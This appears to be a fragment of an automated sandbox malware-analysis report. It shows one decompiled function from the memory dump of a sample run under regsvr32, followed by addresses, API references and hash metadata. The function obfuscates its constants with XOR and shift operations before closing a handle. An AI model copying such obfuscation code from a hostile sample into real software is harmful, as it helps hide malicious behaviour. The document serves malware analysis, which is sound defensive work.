				signed int _v16;
				intOrPtr _v20;
				void* _t29;
				int _t35;
				void* _t38;

				_push(_a8);
				_t38 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04D432C4(_t29);
				_v20 = 0x5d7bf;
				_v16 = 0x99716;
				_v16 = 0xe29eb1;
				_v16 = _v16 ^ 0x3393c2ed;
				_v16 = _v16 ^ 0x337b9675;
				_v8 = 0xbc32bf;
				_v8 = _v8 + 0xffff25e6;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0xde5dd6d8;
				_v8 = _v8 ^ 0xde59c7e5;
				_v12 = 0xe3d251;
				_v12 = _v12 >> 5;
				_v12 = _v12 | 0x08a6b2c4;
				_v12 = _v12 ^ 0x08adb9ba;
				E04D352F2(__ecx, __edx, __ecx, 0x34, 0x2b7f8c29, 0x9f49d153);
				_t35 = FindCloseChangeNotification(_t38); // executed
				return _t35;
			}










                                                                                                            0x04d38b73
                                                                                                            0x04d38b76
                                                                                                            0x04d38b78
                                                                                                            0x04d38b7b
                                                                                                            0x04d38b7c
                                                                                                            0x04d38b7d
                                                                                                            0x04d38b82
                                                                                                            0x04d38b8c
                                                                                                            0x04d38b93
                                                                                                            0x04d38b9a
                                                                                                            0x04d38ba1
                                                                                                            0x04d38ba8
                                                                                                            0x04d38baf
                                                                                                            0x04d38bb6
                                                                                                            0x04d38bba
                                                                                                            0x04d38bc1
                                                                                                            0x04d38bc8
                                                                                                            0x04d38bcf
                                                                                                            0x04d38bd3
                                                                                                            0x04d38bda
                                                                                                            0x04d38bf7
                                                                                                            0x04d38c00
                                                                                                            0x04d38c06

                                                                                                            APIs
                                                                                                            • FindCloseChangeNotification.KERNEL32(?,?,?,?,?,?,?,?,000BFAA1), ref: 04D38C00
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.897029894.0000000004D30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.897053555.0000000004D52000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_4d30000_regsvr32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                            • String ID:
                                                                                                            • API String ID: 2591292051-0
                                                                                                            • Opcode ID: 8bbb35c7ee8c589e2d73615254176720b78bb129de417fc4cb1d75a5b3d4ba90
                                                                                                            • Instruction ID: a2806dfd7b6b95d76290dec21f0f2238e51c94d7e952e87e367409f26a09c2e5
                                                                                                            • Opcode Fuzzy Hash: 8bbb35c7ee8c589e2d73615254176720b78bb129de417fc4cb1d75a5b3d4ba90
                                                                                                            • Instruction Fuzzy Hash: D2011775D0521CFBDB14EFA8894A88EBBB4EF00318F108489E825B7250D7755B14DF90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%